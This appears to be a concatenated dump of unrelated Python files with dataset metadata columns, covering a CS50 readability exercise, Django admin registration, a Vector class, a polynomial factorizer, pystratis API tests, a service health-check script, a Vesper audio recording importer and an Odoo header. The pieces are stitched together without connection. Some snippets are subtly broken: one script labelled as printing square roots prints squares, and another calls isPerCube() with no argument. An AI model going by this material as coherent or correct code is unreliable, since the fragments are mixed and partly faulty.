| 0.533138
| 0
| 0
| 362
| 0.212317
|
556657f3480d4123e6f0535b01c6ed2f5345122d
| 615
|
py
|
Python
|
week_06/readibility.py
|
fentybit/cs50
|
a6089e8ba47d0a8990cac3e0b5b28c5f2ba9f9c3
|
[
"CNRI-Python"
] | null | null | null |
week_06/readibility.py
|
fentybit/cs50
|
a6089e8ba47d0a8990cac3e0b5b28c5f2ba9f9c3
|
[
"CNRI-Python"
] | null | null | null |
week_06/readibility.py
|
fentybit/cs50
|
a6089e8ba47d0a8990cac3e0b5b28c5f2ba9f9c3
|
[
"CNRI-Python"
] | null | null | null |
from cs50 import get_string
text = get_string("Text: ")
text_length = len(text)
letters = 0
sentences = 0
words = 1
for i in range(text_length):
if text[i].isalpha():
letters += 1
for i in range(text_length):
if ord(text[i]) == 46 or ord(text[i]) == 33 or ord(text[i]) == 63:
sentences += 1
for i in range(text_length):
if ord(text[i]) == 32:
words += 1
L = 100 * (letters / words)
S = 100 * (sentences / words)
grade = round(0.0588 * L - 0.296 * S - 15.8)
if 16 <= grade:
print("Grade 16+")
elif grade < 1:
print("Before Grade 1")
else:
print(f"Grade {grade}")
| 20.5
| 70
| 0.588618
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 51
| 0.082927
|
5567063c93ec8ddf93486996ed882ce5ca8b8b9d
| 206
|
py
|
Python
|
fauxblog/admin.py
|
nickobrad/faux
|
cecb03e97a176149606dc88373d1844fc1f6b23c
|
[
"MIT"
] | null | null | null |
fauxblog/admin.py
|
nickobrad/faux
|
cecb03e97a176149606dc88373d1844fc1f6b23c
|
[
"MIT"
] | null | null | null |
fauxblog/admin.py
|
nickobrad/faux
|
cecb03e97a176149606dc88373d1844fc1f6b23c
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Category, ImagePost, Location
# Register your models here.
admin.site.register(ImagePost)
admin.site.register(Category)
admin.site.register(Location)
| 20.6
| 49
| 0.81068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.135922
|
556731a35682ef9f34de75b049e18d73969d3bfa
| 1,574
|
py
|
Python
|
lib/Vector.py
|
aldahick/dotter.py
|
c3e783801f36403476087b5638a93e5fd5959bbe
|
[
"MIT"
] | null | null | null |
lib/Vector.py
|
aldahick/dotter.py
|
c3e783801f36403476087b5638a93e5fd5959bbe
|
[
"MIT"
] | null | null | null |
lib/Vector.py
|
aldahick/dotter.py
|
c3e783801f36403476087b5638a93e5fd5959bbe
|
[
"MIT"
] | null | null | null |
import math
from random import randint
# pylint: disable=I0011,invalid-name
class Vector(object):
def __init__(self, x, y=None):
self.x = x
if y is None:
self.y = x
else:
self.y = y
def get_distance(self, other):
distance = self.get_distance_components(other)
return math.sqrt(pow(distance.x, 2) + pow(distance.y, 2))
def get_distance_components(self, other):
return Vector(abs(self.x - other.x), abs(self.y - other.y))
def add(self, other):
return self._calc(other, lambda a, b: a + b)
def sub(self, other):
return self._calc(other, lambda a, b: a - b)
def mul(self, other):
return self._calc(other, lambda a, b: a * b)
def div(self, other):
return self._calc(other, lambda a, b: a / b)
def _calc(self, other, func):
if isinstance(other, Vector):
return Vector(func(self.x, other.x), func(self.y, other.y))
else:
return Vector(func(self.x, other), func(self.y, other))
def __str__(self):
return "({}, {})".format(self.x, self.y)
def slow(self, diff):
self.x = Vector._slow(diff, self.x)
self.y = Vector._slow(diff, self.y)
@staticmethod
def _slow(diff, num):
if num == 0:
return 0
if num > 0:
return num - diff
else:
return num + diff
@staticmethod
def rand(min_v, max_v):
x = randint(min_v.x, max_v.x)
y = randint(min_v.y, max_v.y)
return Vector(x, y)
| 26.677966
| 71
| 0.559085
| 1,496
| 0.950445
| 0
| 0
| 320
| 0.203304
| 0
| 0
| 46
| 0.029225
|
55686a8be609e908e7580542f40aa36255c8c155
| 12,532
|
py
|
Python
|
functions.py
|
flyingmat/pyfactorizer
|
6e607408bc21d04b09ecabfc6a579ad4058965f5
|
[
"MIT"
] | null | null | null |
functions.py
|
flyingmat/pyfactorizer
|
6e607408bc21d04b09ecabfc6a579ad4058965f5
|
[
"MIT"
] | null | null | null |
functions.py
|
flyingmat/pyfactorizer
|
6e607408bc21d04b09ecabfc6a579ad4058965f5
|
[
"MIT"
] | null | null | null |
from math import floor
remove_spaces = lambda inlst: [i for i in inlst if i != ' ']
def sf2i(inp):
if float(inp).is_integer():
return str(int(inp))
else:
return str(inp)
def fix_signs(inlst):
i = 0
while i < len(inlst):
if inlst[i] in '+-': # first sign is detected
sign = -1 if inlst[i] == '-' else 1 # sign variable assigned
while i+1 < len(inlst) and inlst[i+1] in '+-': # while more signs are present
if inlst[i+1] == '-': # invert the sign if a minus is detected
sign *= -1
del inlst[i+1] # delete each excessive sign
inlst[i] = '-' if sign == -1 else '+' # change the only sign left's value accordingly
i += 1 # keep checking for other signs
return inlst
def fix_dict(indict):
if type(indict) == dict:
return frozenset(indict.items())
else:
return indict
def get_coefficient(inlst, i):
coeff = ''
k = i - 1
while k >= 0 and inlst[k] in '1234567890.': # keep going backwards to get the full coefficient
coeff = inlst[k] + coeff
k -= 1
coeff = '1' if not coeff else coeff # if no coefficient is specified, 1 is assigned
if k >= 0 and inlst[k] == '-': # check for a minus sign
coeff = '-' + coeff
k = 0 if k < 0 else k # value correction for convert()
coeff = float(coeff)
return (coeff, k)
def get_exponent(inlst, i):
exp = ''
if i+1 < len(inlst) and inlst[i+1] == '^':
k = i + 2
while k < len(inlst) and inlst[k] in '1234567890': # keep going forward to get the full exponent
exp += inlst[k]
k += 1
else:
k = i + 1 # value correction for convert()
exp = 1 if not exp else exp # if no exponent is specified, 1 is assigned
exp = int(exp) # exponents are assumed to be positive integers
return (exp, k)
def convert(inlst):
exps = {}
i = 0
while i < len(inlst):
if inlst[i] == 'x': # if an x-term is detected
(coeff, x_start) = get_coefficient(inlst, i) # get its coefficient
(exp, x_end) = get_exponent(inlst, i) # get its exponent
if exp not in exps:
exps[exp] = coeff
else:
exps[exp] += coeff
del inlst[x_start:x_end]
i = x_start
i += 1
return exps
def solve_x0_terms(inlst):
out = 0
current_term = ''
while inlst:
item = inlst.pop(0)
if item in '#+-':
out += float(current_term) if current_term else 0
current_term = '-' if item == '-' else ''
elif item in '1234567890.':
current_term += item
out += float(current_term) if current_term else 0
return out
def divide_func(exps, div): # uses polynomial long division
newexps = {}
for current_exp in range(max(exps)-max(div), -1, -1):
if max(exps) - max(div) != current_exp: # bugfix: FOR Loop coud be changed to something more efficient (needs testing with high exponents)
continue
newexps[current_exp] = exps[max(exps)] / div[max(div)]
for exp, coeff in div.items():
m_coeff = exp + current_exp
if m_coeff not in exps:
exps[m_coeff] = 0
exps[m_coeff] -= (newexps[current_exp] * coeff)
if exps[m_coeff] == 0:
del exps[m_coeff] # deletion required because of max() in the main loop that could return a coeff with value 0
if 0 not in newexps:
newexps[0] = 0
return newexps if not exps or not exps[0] else {} # if there is a reminder, return an empty dict; could be changed to return reminder
def n_factors(n):
if type(n) == float and not n.is_integer():
raise StopIteration
else:
n = int(n)
yield (n, 1)
if n % 2 == 0:
for i in range(floor(abs(n/2)), 0, -1):
if n % i == 0:
yield (i, int(n/i))
else:
tn = floor(abs(n/2))
for i in range( (tn - 1 if tn % 2 == 0 else tn), 0, -2 ):
if n % i == 0:
yield (i, int(n/i))
def x2terms(exps):
a = exps[2] if 2 in exps else 0
b = exps[1] if 1 in exps else 0
c = exps[0] if 0 in exps else 0
return a,b,c
def delta_calc(a,b,c):
return b**2 - 4*a*c
def pow_diff(poly):
out = ()
if max(poly) % 2 == 0:
root_exp = (1.0 / 2)
else:
root_exp = (1.0 / max(poly))
root1 = (abs(poly[max(poly)]) ** root_exp) * (-1 if poly[max(poly)] < 0 else 1)
root2 = (abs(poly[0]) ** root_exp) * (-1 if poly[0] < 0 else 1)
if root1.is_integer() and root2.is_integer():
root1, root2 = int(root1), int(root2)
if max(poly) % 2 == 0:
if poly[0]*poly[max(poly)] < 0:
xm, x0 = root1, root2
out = (( { int(max(poly)/2):xm, 0:x0 }, 1 ), ( { int(max(poly)/2):(xm if xm > 0 else -xm), 0:(x0 if xm < 0 else -x0) }, 1 ))
else:
out = [( { 1:root1, 0:root2}, 1 )]
return out
def binomial_mult_3(poly, expsort):
out = ()
for x0t1, x0t2 in n_factors(poly[0]):
for xmt1, xmt2 in n_factors(poly[expsort[0]]):
if (xmt1*x0t2)+(xmt2*x0t1) == poly[expsort[1]]:
p_div1 = { expsort[1]:xmt1, 0:x0t1 }
p_div2 = { expsort[1]:xmt2, 0:x0t2 }
out = (( p_div1, 1 ), ( p_div2, 1 ))
return out
def binomial_pow3(poly, expsort):
out = ()
if expsort[0] % 3 == 0:
root1 = (abs(poly[expsort[0]]) ** (1.0/3)) * (-1 if poly[expsort[0]] < 0 else 1)
root2 = (abs(poly[0]) ** (1.0/3)) * (-1 if poly[0] < 0 else 1)
if root1.is_integer() and root2.is_integer():
if poly[expsort[1]] == 3*(root1**2)*root2 and poly[expsort[2]] == 3*(root2**2)*root1:
out = [({ expsort[2]:root1, 0:root2 }, 3)]
return out
def binomial_mult_4(poly, expsort):
out = ()
if poly[expsort[0]] / poly[expsort[2]] == poly[expsort[1]] / poly[expsort[3]]:
cfs = [poly[e] for e in expsort]
for (n3, _) in n_factors( max(abs(cfs[0]), abs(cfs[1])) - min(abs(cfs[0]), abs(cfs[1])) ):
if 0 == cfs[0] % n3 == cfs[1] % n3:
n1 = int(cfs[0]/n3)
n2 = int(cfs[1]/n3)
if cfs[3] % n2 == 0:
n4 = int(cfs[3]/n2)
out = [({ min(expsort[1],expsort[2]):n1, 0:n2 }, 1), ({ max(expsort[1],expsort[2]):n3, 0:n4 }, 1)]
break
return out
def bf_int_coordinates(exps):
out_cord = set()
for i in range(2,101):
k = 1/i
if check_fact(exps,k):
yield k
if check_fact(exps,-k):
yield -k
for i in range(1,1001):
if check_fact(exps,i):
yield i
if check_fact(exps,-i):
yield -i
def check_fact(exps,fact):
out = 0
for exp in exps:
out += exps[exp] * (fact**exp)
return round(out,15) == 0
def factorize(poly_stack, func):
poly = poly_stack.pop()
tmexp = max(poly)
div_polys = []
common_factor = 1
checknegative = set([c < 0 for c in poly.values()])
# factorizing checks
for (i, _) in n_factors(min([abs(v) for v in poly.values() if v != 0])): # if common factor in poly, divide e.g. 2x^2+4 -> 2(x^2+2)
checkmult = set() # check performed on every iteration because of coeffs changing with division
for coeff in poly.values():
checkmult.add(coeff % i)
if len(checkmult) == 1 and 0 in checkmult:
common_factor = i if checknegative != set([True]) else -i
break
if common_factor != 1:
div_polys = [ ({ 0:common_factor }, 1) ]
elif len(poly) > 2 and tmexp and poly[0] == 0: # x^5 + x^3 -> x^3(x^2 + 1)
div_polys = [ ({ 1:1, 0:0 }, min([e if e > 0 else tmexp for e in poly])) ]
elif len(poly) == 2 and max(poly) > 1 and poly[0]: # x^2 - 1 -> (x + 1)(x - 1), x^3 - 1, x^3 + 1, etc.
div_polys = pow_diff(poly)
elif len(poly) == 3 and poly[0]: # x^2 + 2x + 1 -> (x + 1)^2, 3x^2 + 7x + 2 -> (3x + 1)(x + 2), etc. max exp can be > 2
expsort = sorted(poly)[::-1]
if expsort[0] % 2 == 0 and expsort[0]-expsort[1] == expsort[1]-expsort[2]:
div_polys = binomial_mult_3(poly, expsort)
elif len(poly) == 4 and poly[0]:
expsort = sorted(poly)[::-1]
if expsort[0]-expsort[1] == expsort[1]-expsort[2] == expsort[2]-expsort[3]:
div_polys = binomial_pow3(poly, expsort)
if not div_polys: # 6x^6 + 4x^4 + 15x^2 + 10 would trigger the first check but not the second when using ELIF (one doesn't exlude the other)
if expsort[0]-expsort[2] == expsort[1]-expsort[3]:
div_polys = binomial_mult_4(poly,expsort)
if not div_polys and tmexp > 2:
# bruteforce
div_count = tmexp
for xv in bf_int_coordinates(poly):
div_polys.append(({ 1:1, 0:-xv }, 1))
div_count -= 1
if div_count == 0:
break
for p, e in div_polys:
for div_i in range(e):
poly = divide_func(poly, p)
if (max(p) > 2) or (max(p) == 2 and p[0] and delta_calc(*x2terms(p)) >= 0):
poly_stack.append(p)
else:
func.add(p, 1)
if div_polys and ((max(poly) > 2) or (max(poly) == 2 and poly[0] and delta_calc(*x2terms(poly)) >= 0)):
poly_stack.append(poly)
else:
if len(poly) == 2 and not poly[0]: # fix for ax^2 -> x^2 divided by a -> poly = {2:1,0:0}:1, should be {1:1,0:0}:2
func.add({ 1:1, 0:0 }, max(poly))
else:
func.add(poly, 1)
if poly_stack:
factorize(poly_stack, func)
def polyformat(polys, x0t):
out = ['','']
brackets = False
if len(polys) > 1 or x0t != 1:
brackets = True
out[0] += sf2i(x0t) if x0t not in (1,-1) or len(polys) == 0 else '-' if x0t == -1 else ''
for poly, exp in polys.items():
poly = dict(poly)
if len(poly) == 2 and not poly[0]:
out[1] = 'x'
if exp > 1:
out[1] += '^' + str(exp)
else:
current_poly = ''
if exp > 1:
brackets = True
expsort = sorted(poly)[::-1]
for e in expsort:
current_poly += '- ' if poly[e] < 0 else '+ ' if poly[e] > 0 else ''
if e != 0:
current_poly += sf2i(abs(poly[e])) if poly[e] not in (1,-1) else ''
current_poly += 'x'
current_poly += '^' + sf2i(e) + ' ' if e != 1 else ' '
else:
current_poly += sf2i(abs(poly[e])) if poly[e] else ''
if current_poly[0] == '+':
current_poly = current_poly[2:]
elif current_poly[0] == '-' and brackets:
current_poly = '-' + current_poly[2:]
current_poly = '(' + current_poly + ')' if brackets else current_poly
current_poly += '^' + sf2i(exp) if exp != 1 else ''
out.append(current_poly)
return ''.join(out)
class Function():
def __init__(self, data):
self.data = {}
self.x0t = 1
if type(data) == dict:
self.exps = data
else:
self.eqt = remove_spaces(data)
self.eqt = fix_signs(self.eqt)
self.exps = convert(self.eqt) # self.eqt is referenced and edited directly by convert()
if 0 not in self.exps: # 0 may already be in exps because of x^0 terms
self.exps[0] = 0
self.exps[0] += solve_x0_terms(self.eqt) # x-terms have already been removed from self.eqt
self.out = ""
def __repr__(self):
return repr(self.data)
def add(self, indict, exp):
if len(dict(indict)) == 1:
self.x0t *= ((dict(indict))[0] ** exp) # number-only terms (x^0) are managed separately
else:
self.indict = fix_dict(indict)
if self.indict in self.data:
self.data[self.indict] += exp
else:
self.data[self.indict] = exp
def factorize(self):
if set(self.exps.values()) != set([0]):
factorize([self.exps], self)
#print(self.data)
return polyformat(self.data, self.x0t)
else:
return '0'
| 39.040498
| 151
| 0.514682
| 1,265
| 0.100942
| 770
| 0.061443
| 0
| 0
| 0
| 0
| 1,829
| 0.145946
|
556a5954e27e88a1963c24a16323e7c269ae5148
| 2,556
|
py
|
Python
|
pystratis/api/balances/tests/test_balances.py
|
madrazzl3/pystratis
|
8b78552e753ae1d12f2afb39e9a322a270fbb7b3
|
[
"MIT"
] | null | null | null |
pystratis/api/balances/tests/test_balances.py
|
madrazzl3/pystratis
|
8b78552e753ae1d12f2afb39e9a322a270fbb7b3
|
[
"MIT"
] | null | null | null |
pystratis/api/balances/tests/test_balances.py
|
madrazzl3/pystratis
|
8b78552e753ae1d12f2afb39e9a322a270fbb7b3
|
[
"MIT"
] | null | null | null |
import pytest
from pytest_mock import MockerFixture
from pystratis.api.balances import Balances
from pystratis.core.types import Address
from pystratis.core.networks import CirrusMain
def test_all_strax_endpoints_implemented(strax_swagger_json):
paths = [key.lower() for key in strax_swagger_json['paths']]
for endpoint in paths:
if Balances.route + '/' in endpoint:
assert endpoint in Balances.endpoints
def test_all_cirrus_endpoints_implemented(cirrus_swagger_json):
paths = [key.lower() for key in cirrus_swagger_json['paths']]
for endpoint in paths:
if Balances.route + '/' in endpoint:
assert endpoint in Balances.endpoints
def test_all_interfluxstrax_endpoints_implemented(interfluxstrax_swagger_json):
paths = [key.lower() for key in interfluxstrax_swagger_json['paths']]
for endpoint in paths:
if Balances.route + '/' in endpoint:
assert endpoint in Balances.endpoints
def test_all_interfluxcirrus_endpoints_implemented(interfluxcirrus_swagger_json):
paths = [key.lower() for key in interfluxcirrus_swagger_json['paths']]
for endpoint in paths:
if Balances.route + '/' in endpoint:
assert endpoint in Balances.endpoints
@pytest.mark.parametrize('network', [CirrusMain()], ids=['CirrusMain'])
def test_overamountatheight(mocker: MockerFixture, network, overamountatheightresponse):
data = overamountatheightresponse(network)
mocker.patch.object(Balances, 'get', return_value=data)
balances = Balances(network=network, baseuri=mocker.MagicMock(), session=mocker.MagicMock())
response = balances.over_amount_at_height(block_height=10, amount=10)
assert len(response) == len(data)
for i in range(len(response)):
assert isinstance(response[i], Address)
assert response[i] == data[i]
# noinspection PyUnresolvedReferences
balances.get.assert_called_once()
@pytest.mark.parametrize('network', [CirrusMain()], ids=['CirrusMain'])
def test_overamountatheight_none(mocker: MockerFixture, network):
data = []
mocker.patch.object(Balances, 'get', return_value=data)
balances = Balances(network=network, baseuri=mocker.MagicMock(), session=mocker.MagicMock())
response = balances.over_amount_at_height(block_height=10, amount=10)
assert len(response) == len(data)
for i in range(len(response)):
assert isinstance(response[i], Address)
assert response[i] == data[i]
# noinspection PyUnresolvedReferences
balances.get.assert_called_once()
| 38.727273
| 96
| 0.736307
| 0
| 0
| 0
| 0
| 1,302
| 0.50939
| 0
| 0
| 166
| 0.064945
|
556d8216ffbaa6f7a0d0816c6b1ba9baa984c1a1
| 381
|
py
|
Python
|
Problems/14.py
|
Maurya232Abhishek/Python-repository-for-basics
|
3dcec5c529a0847df07c9dcc1424675754ce6376
|
[
"MIT"
] | 2
|
2021-07-14T11:01:58.000Z
|
2021-07-14T11:02:01.000Z
|
Problems/14.py
|
Maurya232Abhishek/Python-repository-for-basics
|
3dcec5c529a0847df07c9dcc1424675754ce6376
|
[
"MIT"
] | null | null | null |
Problems/14.py
|
Maurya232Abhishek/Python-repository-for-basics
|
3dcec5c529a0847df07c9dcc1424675754ce6376
|
[
"MIT"
] | null | null | null |
def isPerCube(n):
x = n**(1/3)
x= x+0.5
x = int(x)
if x**3==n:
return True
return False
""" x = 2
while True:
y = n / (x * x)
if (x == y):
print(x)
if x == int(x):
return True
else:
return False
x = (y + x + x) / 3
print(x)"""
print(isPerCube())
| 19.05
| 28
| 0.351706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 245
| 0.643045
|
556e3ec9c1d73a0070074ad45f8de00d47c96b09
| 179
|
py
|
Python
|
year1/python/week2/q9_squareroots.py
|
OthmanEmpire/university
|
3405e1463e82ca2e6f7deef05c3b1ba0ab9c1278
|
[
"MIT"
] | 1
|
2016-05-21T17:23:50.000Z
|
2016-05-21T17:23:50.000Z
|
year1/python/week2/q9_squareroots.py
|
OthmanEmpire/university_code
|
3405e1463e82ca2e6f7deef05c3b1ba0ab9c1278
|
[
"MIT"
] | null | null | null |
year1/python/week2/q9_squareroots.py
|
OthmanEmpire/university_code
|
3405e1463e82ca2e6f7deef05c3b1ba0ab9c1278
|
[
"MIT"
] | null | null | null |
## This program prints out the first 10 square roots that are even ##
for x in range(1,10):
y = (2*x)**2 # If n^2 is even hence n must be even as well
print(y)
| 29.833333
| 72
| 0.603352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 114
| 0.636872
|
556f083296f917021fc8c5ac171cde72ce1bed3a
| 1,690
|
py
|
Python
|
backend/health/health_check.py
|
threefoldtech/zeroCI
|
851def4cbaebba681641ecb24c731de56277d6ed
|
[
"Apache-2.0"
] | null | null | null |
backend/health/health_check.py
|
threefoldtech/zeroCI
|
851def4cbaebba681641ecb24c731de56277d6ed
|
[
"Apache-2.0"
] | 52
|
2019-11-14T09:39:04.000Z
|
2021-03-16T10:15:55.000Z
|
backend/health/health_check.py
|
AhmedHanafy725/0-CI
|
ce73044eea2c15bcbb161a1d6f23e75e4f8d53a0
|
[
"Apache-2.0"
] | 1
|
2019-10-30T09:51:25.000Z
|
2019-10-30T09:51:25.000Z
|
import sys
sys.path.append("/sandbox/code/github/threefoldtech/zeroCI/backend")
from redis import Redis
from health_recover import Recover
from utils.utils import Utils
recover = Recover()
class Health(Utils):
def get_process_pid(self, name):
cmd = f"ps -aux | grep -v grep | grep '{name}' | awk '{{print $2}}'"
response = self.execute_cmd(cmd=cmd, timeout=5)
pids = response.stdout.split()
return pids
def test_zeroci_server(self):
"""Check zeroci server is still running
"""
pid = self.get_process_pid("python3 zeroci")
if not pid:
recover.zeroci()
def test_redis(self):
"""Check redis is still running.
"""
pid = self.get_process_pid("redis")
if not pid:
recover.redis()
try:
r = Redis()
r.set("test_redis", "test")
r.get("test_redis")
r.delete("test_redis")
except:
recover.redis()
def test_workers(self):
"""Check rq workers are up.
"""
pids = self.get_process_pid("python3 worker")
workers = len(pids)
if workers < 5:
for i in range(1, 6):
pid = self.get_process_pid(f"python3 worker{i}")
if not pid:
recover.worker(i)
def test_schedule(self):
"""Check rq schedule is up.
"""
pid = self.get_process_pid("rqscheduler")
if not pid:
recover.scheduler()
if __name__ == "__main__":
health = Health()
health.test_zeroci_server()
health.test_redis()
health.test_workers()
health.test_schedule()
| 25.606061
| 76
| 0.562722
| 1,334
| 0.789349
| 0
| 0
| 0
| 0
| 0
| 0
| 410
| 0.242604
|
5570f5a350941f5510b456b02cd8353c974ae345
| 13,284
|
py
|
Python
|
vesper/command/recording_importer.py
|
RichardLitt/Vesper
|
5360844f42a06942e7684121c650b08cf8616285
|
[
"MIT"
] | null | null | null |
vesper/command/recording_importer.py
|
RichardLitt/Vesper
|
5360844f42a06942e7684121c650b08cf8616285
|
[
"MIT"
] | null | null | null |
vesper/command/recording_importer.py
|
RichardLitt/Vesper
|
5360844f42a06942e7684121c650b08cf8616285
|
[
"MIT"
] | null | null | null |
"""Module containing class `RecordingImporter`."""
from pathlib import Path
import itertools
import logging
import os
from django.db import transaction
from vesper.command.command import CommandExecutionError
from vesper.django.app.models import (
DeviceConnection, Job, Recording, RecordingChannel, RecordingFile)
from vesper.singletons import recording_manager
import vesper.command.command_utils as command_utils
import vesper.command.recording_utils as recording_utils
import vesper.util.audio_file_utils as audio_file_utils
import vesper.util.signal_utils as signal_utils
import vesper.util.time_utils as time_utils
class RecordingImporter:
"""
Importer for recordings already stored in files on the Vesper server.
The recordings to be imported are specified in the `paths` argument
as server-side directory and file paths. Files from directories can
be imported either recursively or non-recursively according to the
`recursive` argument. The import does not copy or move recordings:
it stores the existing paths of their files for future reference.
The importer obtains recording metadata for imported files with the
aid of a recording file parser extension, specified by the
`recording_file_parser` argument.
"""
extension_name = 'Recording Importer'
def __init__(self, args):
self.paths = command_utils.get_required_arg('paths', args)
self.recursive = command_utils.get_optional_arg(
'recursive', args, True)
spec = command_utils.get_optional_arg('recording_file_parser', args)
self.file_parser = recording_utils.create_recording_file_parser(spec)
def execute(self, job_info):
self._job = Job.objects.get(id=job_info.job_id)
self._logger = logging.getLogger()
try:
recordings = self._get_recordings()
new_recordings, old_recordings = \
self._partition_recordings(recordings)
self._log_header(new_recordings, old_recordings)
with transaction.atomic():
self._import_recordings(new_recordings)
except Exception as e:
self._logger.error((
'Recording import failed with an exception.\n'
'The exception message was:\n'
' {}\n'
'The archive was not modified.\n'
'See below for exception traceback.').format(str(e)))
raise
else:
self._log_imports(new_recordings)
return True
def _get_recordings(self):
files = list(itertools.chain.from_iterable(
self._get_path_recording_files(path) for path in self.paths))
return recording_utils.group_recording_files(files)
def _get_path_recording_files(self, path):
if os.path.isdir(path):
return self._get_dir_recording_files(path)
else:
file = self._get_recording_file(path)
return [] if file is None else [file]
def _get_dir_recording_files(self, path):
files = []
for (dir_path, dir_names, file_names) in os.walk(path):
for file_name in file_names:
file_path = os.path.join(dir_path, file_name)
file = self._get_recording_file(Path(file_path))
if file is not None:
files.append(file)
if not self.recursive:
# Stop `os.walk` from descending into subdirectories.
del dir_names[:]
return files
def _get_recording_file(self, file_path):
if not audio_file_utils.is_wave_file_path(file_path):
return None
else:
rel_path, abs_path = self._get_recording_file_paths(file_path)
file = self._parse_recording_file(abs_path)
file.path = rel_path
_set_recording_file_channel_info(file)
return file
def _get_recording_file_paths(self, file_path):
if file_path.is_absolute():
if not file_path.exists():
raise CommandExecutionError(
'Purported recording file "{}" does not exist.')
rel_path = self._get_relative_path(file_path)
return rel_path, file_path
else:
# path is relative
abs_path = self._get_absolute_path(file_path)
return file_path, abs_path
def _get_relative_path(self, file_path):
manager = recording_manager.instance
try:
_, rel_path = manager.get_relative_recording_file_path(file_path)
except ValueError:
self._handle_bad_recording_file_path(
file_path, 'is not in', manager)
return rel_path
def _handle_bad_recording_file_path(self, file_path, condition, manager):
dir_paths = manager.recording_dir_paths
if len(dir_paths) == 1:
s = 'the recording directory "{}"'.format(dir_paths[0])
else:
path_list = str(list(dir_paths))
s = 'any of the recording directories {}'.format(path_list)
raise CommandExecutionError(
'Recording file "{}" {} {}.'.format(file_path, condition, s))
def _get_absolute_path(self, file_path):
manager = recording_manager.instance
try:
return manager.get_absolute_recording_file_path(file_path)
except ValueError:
self._handle_bad_recording_file_path(
file_path, 'could not be found in', manager)
def _parse_recording_file(self, file_path):
try:
file = self.file_parser.parse_file(str(file_path))
except ValueError as e:
raise CommandExecutionError(
'Error parsing recording file "{}": {}'.format(
file_path, str(e)))
if file.recorder is None:
file.recorder = _get_recorder(file)
return file
def _partition_recordings(self, recordings):
new_recordings = []
old_recordings = []
for r in recordings:
if self._recording_exists(r):
old_recordings.append(r)
else:
new_recordings.append(r)
return (new_recordings, old_recordings)
def _recording_exists(self, recording):
try:
Recording.objects.get(
station=recording.station,
recorder=recording.recorder,
start_time=recording.start_time)
except Recording.DoesNotExist:
return False
else:
return True
def _log_header(self, new_recordings, old_recordings):
log = self._logger.info
new_count = len(new_recordings)
old_count = len(old_recordings)
if new_count == 0 and old_count == 0:
log('Found no recordings at the specified paths.')
else:
new_text = self._get_num_recordings_text(new_count, 'new')
old_text = self._get_num_recordings_text(old_count, 'old')
log('Found {} and {} at the specified paths.'.format(
new_text, old_text))
if len(new_recordings) == 0:
log('No recordings will be imported.')
else:
log('The new recordings will be imported.')
def _get_num_recordings_text(self, count, description):
suffix = '' if count == 1 else 's'
return '{} {} recording{}'.format(count, description, suffix)
def _import_recordings(self, recordings):
for r in recordings:
end_time = signal_utils.get_end_time(
r.start_time, r.length, r.sample_rate)
creation_time = time_utils.get_utc_now()
recording = Recording(
station=r.station,
recorder=r.recorder,
num_channels=r.num_channels,
length=r.length,
sample_rate=r.sample_rate,
start_time=r.start_time,
end_time=end_time,
creation_time=creation_time,
creating_job=self._job)
recording.save()
r.model = recording
for channel_num in range(r.num_channels):
recorder_channel_num = r.recorder_channel_nums[channel_num]
mic_output = r.mic_outputs[channel_num]
channel = RecordingChannel(
recording=recording,
channel_num=channel_num,
recorder_channel_num=recorder_channel_num,
mic_output=mic_output)
channel.save()
start_index = 0
for file_num, f in enumerate(r.files):
# We store all paths in the archive database as POSIX
# paths, even on Windows, for portability, since Python's
# `pathlib` module recognizes the slash as a path separator
# on all platforms, but not the backslash.
path = f.path.as_posix()
file = RecordingFile(
recording=recording,
file_num=file_num,
start_index=start_index,
length=f.length,
path=path)
file.save()
start_index += f.length
def _log_imports(self, recordings):
for r in recordings:
log = self._logger.info
log('Imported recording {} with files:'.format(str(r.model)))
for f in r.files:
log(' {}'.format(f.path.as_posix()))
def _get_recorder(file):
end_time = signal_utils.get_end_time(
file.start_time, file.length, file.sample_rate)
station_recorders = file.station.get_station_devices(
'Audio Recorder', file.start_time, end_time)
if len(station_recorders) == 0:
raise CommandExecutionError(
'Could not find recorder for recording file "{}".'.format(
file.path))
elif len(station_recorders) > 1:
raise CommandExecutionError(
'Found more than one possible recorder for file "{}".'.format(
file.path))
else:
return station_recorders[0].device
def _set_recording_file_channel_info(file):
mic_outputs = _get_recorder_mic_outputs(file.recorder, file.start_time)
if file.recorder_channel_nums is None:
# file name did not indicate recorder channel numbers
if len(mic_outputs) != file.num_channels:
# number of connected mic outputs does not match number
# of file channels
raise CommandExecutionError((
'Could not infer recorder channel numbers for '
'recording file "{}".').format(file.path))
else:
# number of connected mic outputs matches number of file
# channels
# We assume that recorder inputs map to file channel numbers
# in increasing order.
file.recorder_channel_nums = tuple(sorted(mic_outputs.keys()))
file.mic_outputs = tuple(
_get_mic_output(mic_outputs, i, file.path)
for i in file.recorder_channel_nums)
def _get_recorder_mic_outputs(recorder, time):
"""
Gets a mapping from recorder input channel numbers to connected
microphone outputs for the specified recorder and time.
"""
connections = DeviceConnection.objects.filter(
input__device=recorder,
output__device__model__type='Microphone',
start_time__lte=time,
end_time__gt=time)
# print('recording_importer.get_recorder_mic_outputs', connections.query)
return dict((c.input.channel_num, c.output) for c in connections)
def _get_mic_output(mic_outputs, channel_num, file_path):
try:
return mic_outputs[channel_num]
except KeyError:
raise CommandExecutionError((
'Could not find microphone output connected to recorder input '
'{} for recording file "{}".').format(channel_num, file_path))
| 32.479218
| 77
| 0.564664
| 10,033
| 0.755269
| 0
| 0
| 0
| 0
| 0
| 0
| 2,400
| 0.180668
|
557658851f4a3ae8f5f44ddef879cff02f03ad5f
| 1,096
|
py
|
Python
|
l10n_ar_ux/models/res_company.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | 1
|
2021-01-25T15:57:58.000Z
|
2021-01-25T15:57:58.000Z
|
l10n_ar_ux/models/res_company.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | null | null | null |
l10n_ar_ux/models/res_company.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | 2
|
2020-10-17T16:36:02.000Z
|
2021-01-24T10:20:05.000Z
|
##############################################################################
# For copyright and license notices, see __manifest__.py file in module root
# directory
##############################################################################
